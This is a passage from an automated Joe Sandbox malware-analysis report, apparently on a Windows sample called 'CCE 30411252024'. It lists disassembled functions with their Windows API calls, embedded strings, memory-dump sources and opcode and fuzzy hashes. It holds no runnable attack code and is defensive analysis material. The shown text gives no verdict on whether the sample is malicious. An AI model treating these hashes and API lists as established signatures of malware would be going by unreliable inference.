                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: d41c6bc8486371769105e776c73a3d6f32c27de97acb62cbb659e8f4a5a44ae6
                                                                                        • Instruction ID: b2313d7a508fb3daada26131a6e186e6c44583d454dbca1d685c88123ae1237f
                                                                                        • Opcode Fuzzy Hash: d41c6bc8486371769105e776c73a3d6f32c27de97acb62cbb659e8f4a5a44ae6
                                                                                        • Instruction Fuzzy Hash: CB615B71508304AFC701EF65CC45EAFBBE8FF89710F000A1DF695A21A1DB719A09DB52
                                                                                        Function 00F2AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00F2AB3D
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F2AB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F2AC40
                                                                                        • __swprintf.LIBCMT ref: 00F2AC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00F2AC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F2AD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00F2ADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00F2AE80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: 8951b9e616a9ecd096857f83d734490cb39442755ec45178b0eb4886014ba98b
                                                                                        • Instruction ID: f88d3ec06b080921bb2a8eabcfadf1123097758122abde418f62bfc64e24bea5
                                                                                        • Opcode Fuzzy Hash: 8951b9e616a9ecd096857f83d734490cb39442755ec45178b0eb4886014ba98b
                                                                                        • Instruction Fuzzy Hash: 9BD1F172A04629DBDB20DF66E884B7AB7B5FF44B10F148495E415AB180DB74EC40FBA2
                                                                                        Function 00F4716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F471FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F47247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 5a49a0c021585a07f938eee7d426462da81c74184f9fd509a914f214b76987ae
                                                                                        • Instruction ID: 88222181b7a65d6437991f0eb7aae126ee0c0b4003727c5c82cba5075835af2a
                                                                                        • Opcode Fuzzy Hash: 5a49a0c021585a07f938eee7d426462da81c74184f9fd509a914f214b76987ae
                                                                                        • Instruction Fuzzy Hash: CD915D352087459BCB04EF10C851A6EBBE1AF94310F005869FD966B3A3DB75FD4AEB81
                                                                                        Function 00F4E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F4E5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F4BEAF), ref: 00F4E607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00F4BEAF), ref: 00F4E6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F4E6DF
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00F4BEAF), ref: 00F4E6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F4E70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F4E717
                                                                                          • Part of subcall function 00F00FA7: __wcsicmp_l.LIBCMT ref: 00F01030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 75859f341ff38f664466c88939d735865109e052036700124fae640d9eb65423
                                                                                        • Instruction ID: 92cf908b7c65d1f94770f021a1c732c6bccd2ea45e5b9f57cc3f6ec800ad75a1
                                                                                        • Opcode Fuzzy Hash: 75859f341ff38f664466c88939d735865109e052036700124fae640d9eb65423
                                                                                        • Instruction Fuzzy Hash: A961D171A50219BEEB24DF64CC46FBE7BA8BB18724F104115F911E60D1EBB4ED80EB60
                                                                                        Function 00F2D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F2D292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00F2D2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D38C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: 251238b173b567ad49a589d770148bc3e7188887bee84b6d4a06701637918e44
                                                                                        • Instruction ID: 962ba155e39e2c0b2ad52b1315fc909fc31877f4a69131ce5655133f3ec67bad
                                                                                        • Opcode Fuzzy Hash: 251238b173b567ad49a589d770148bc3e7188887bee84b6d4a06701637918e44
                                                                                        • Instruction Fuzzy Hash: 26517C715043489FC700EF11D88196EB3E4FF98758F10586CF89A672A2DB31EE06DB82
                                                                                        Function 00F226BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00F53973,00000016,0000138C,00000016,?,00000016,00F7DDB4,00000000,?), ref: 00F226F1
                                                                                        • LoadStringW.USER32(00000000,?,00F53973,00000016), ref: 00F226FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00F53973,00000016,0000138C,00000016,?,00000016,00F7DDB4,00000000,?,00000016), ref: 00F2271C
                                                                                        • LoadStringW.USER32(00000000,?,00F53973,00000016), ref: 00F2271F
                                                                                        • __swprintf.LIBCMT ref: 00F2276F
                                                                                        • __swprintf.LIBCMT ref: 00F22780
                                                                                        • _wprintf.LIBCMT ref: 00F22829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F22840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 618562835-2268648507
                                                                                        • Opcode ID: a404c6e683e90872b11f3e4cdae0767616adb4ceb41606c0adecefbf9dc8c2de
                                                                                        • Instruction ID: 877dd26908a0f041e63aff246f9771c99d8e5239eda4049dc61b5633c9ad0c83
                                                                                        • Opcode Fuzzy Hash: a404c6e683e90872b11f3e4cdae0767616adb4ceb41606c0adecefbf9dc8c2de
                                                                                        • Instruction Fuzzy Hash: CA415E7290025CBADF14FBE1DD86EEEB7B8AF15344F100065F60576092EA74AF09EB61
                                                                                        Function 00F2D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F2D0D8
                                                                                        • __swprintf.LIBCMT ref: 00F2D0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F2D137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F2D15C
                                                                                        • _memset.LIBCMT ref: 00F2D17B
                                                                                        • _wcsncpy.LIBCMT ref: 00F2D1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F2D1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2D1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00F2D200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2D20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 98da1b2c540c82270b635c2c5270e92b198bf448eebea8bb304535b782a2d7fe
                                                                                        • Instruction ID: de66a6951eb62e64b25c488932d2b8b21d048d717bd9d46a97ebee422469b7dc
                                                                                        • Opcode Fuzzy Hash: 98da1b2c540c82270b635c2c5270e92b198bf448eebea8bb304535b782a2d7fe
                                                                                        • Instruction Fuzzy Hash: 2831A372A00119ABDB21DFA0DC49FEB77BCEF89741F1040B6F519D21A1EB74D644AB24
                                                                                        Function 00F4E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F4BEF4,?,?), ref: 00F4E754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E776
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F4E78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F4E7A4
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F6D9BC,?), ref: 00F4E7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F4E7E5
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4E809
                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F4E834
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F4E85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F4E872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 0e0199693c9aa650c44d4d8cd89c7b3e784d0809d0a565ed10ec679919a17642
                                                                                        • Instruction ID: 0e64a3edc84cf51130d32da793ca8aa87fc8bdc832dae225d9ea40f50c5e0bbd
                                                                                        • Opcode Fuzzy Hash: 0e0199693c9aa650c44d4d8cd89c7b3e784d0809d0a565ed10ec679919a17642
                                                                                        • Instruction Fuzzy Hash: 1C414B75A00208FFDB119F65DC88EAA7BB8FF89721F108158F926D7260D7B19D41EB20
                                                                                        Function 00F305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00F3076F
                                                                                        • _wcscat.LIBCMT ref: 00F30787
                                                                                        • _wcscat.LIBCMT ref: 00F30799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F307AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F307C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F307DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F307F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F30806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: d3a202ff9a54f100a259721ccf8606fb2725d517ddfa9c0f8d5bdad7e9ecc6c3
                                                                                        • Instruction ID: c6e810fe8b32a2558b16e8640f48b1d11a1b42194586839a9441b8dda9043f00
                                                                                        • Opcode Fuzzy Hash: d3a202ff9a54f100a259721ccf8606fb2725d517ddfa9c0f8d5bdad7e9ecc6c3
                                                                                        • Instruction Fuzzy Hash: CA819272A043459FCB24DF24C86596EB3E8BBC8324F14882FF885D7251EB34D954EB52
                                                                                        Function 00F4EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F4EF3B
                                                                                        • GetFocus.USER32 ref: 00F4EF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00F4EF56
                                                                                        • _memset.LIBCMT ref: 00F4F081
                                                                                        • GetMenuItemInfoW.USER32 ref: 00F4F0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F4F0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F4F0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F4F113
                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F4F15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F4F193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F4F1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: 042c1531e8e86a9157f1f036cee289ca20a5b8887ae276a9f9eff713ab417780
                                                                                        • Instruction ID: d49e8d0d17ba1f91ead7b1d767505bdd1a720f74a535f07e62c2cdcfc851e7f9
                                                                                        • Opcode Fuzzy Hash: 042c1531e8e86a9157f1f036cee289ca20a5b8887ae276a9f9eff713ab417780
                                                                                        • Instruction Fuzzy Hash: 34816E71A04315AFD710CF14C884A6BBBE5FB88324F14452EFD9997291D770D909EBA2
                                                                                        Function 00F1A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
                                                                                          • Part of subcall function 00F1ABBB: GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
                                                                                          • Part of subcall function 00F1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
                                                                                          • Part of subcall function 00F1ABBB: HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
                                                                                          • Part of subcall function 00F1AC56: GetProcessHeap.KERNEL32(00000008,00F1A6B5,00000000,00000000,?,00F1A6B5,?), ref: 00F1AC62
                                                                                          • Part of subcall function 00F1AC56: HeapAlloc.KERNEL32(00000000,?,00F1A6B5,?), ref: 00F1AC69
                                                                                          • Part of subcall function 00F1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F1A6B5,?), ref: 00F1AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F1A8CB
                                                                                        • _memset.LIBCMT ref: 00F1A8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F1A8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F1A94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F1A969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F1A995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F1A99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F1A9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F1A9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F1A9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F1AA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F1AA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 4c1d7b4e5e7556877cc6fce2b91fa42d70b3f9e84251d9f2599f67863b584e44
                                                                                        • Instruction ID: 94cff757872f49c77fd01abaad576fb5bd7853022e4c217e40a9b73547df3366
                                                                                        • Opcode Fuzzy Hash: 4c1d7b4e5e7556877cc6fce2b91fa42d70b3f9e84251d9f2599f67863b584e44
                                                                                        • Instruction Fuzzy Hash: 7B514B71E01209BFDF10DF91DD45AEEBB79FF04310F048119E921A6290DB799A45EB61
                                                                                        Function 00F39DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00F39E36
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F39E42
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00F39E4E
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00F39E5B
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F39EAF
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F39EEB
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F39F0F
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00F39F17
                                                                                        • DeleteObject.GDI32(?), ref: 00F39F20
                                                                                        • DeleteDC.GDI32(00000006), ref: 00F39F27
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00F39F32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
